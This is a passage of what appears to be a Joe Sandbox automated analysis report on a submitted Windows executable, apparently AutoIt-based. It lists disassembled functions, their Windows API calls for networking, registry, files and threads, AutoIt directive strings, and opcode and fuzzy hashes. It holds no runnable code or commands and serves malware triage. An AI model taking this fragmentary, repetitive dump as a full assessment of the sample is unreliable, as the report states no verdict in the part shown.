                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                          • String ID: \
                                                                          • API String ID: 321622961-2967466578
                                                                          • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                          • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                          Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                          • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                          Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                          Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                          • __lock.LIBCMT ref: 00417981
                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                          • __lock.LIBCMT ref: 004179A2
                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                          • String ID: KERNEL32.DLL$pI
                                                                          • API String ID: 637971194-197072765
                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                          Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_malloc
                                                                          • String ID:
                                                                          • API String ID: 1938898002-0
                                                                          • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                          • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                          Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                          Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                          • String ID:
                                                                          • API String ID: 2737351978-0
                                                                          • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                          • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                          Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                          • __getptd.LIBCMT ref: 00415253
                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                          • _free.LIBCMT ref: 0041529E
                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 3638380555-0
                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                          Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 3207048006-625585964
                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                          Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                          • String ID:
                                                                          • API String ID: 2945290962-0
                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                          Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                          • String ID:
                                                                          • API String ID: 1457242333-0
                                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                          Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                          Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 780548581-3081909835
                                                                          • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
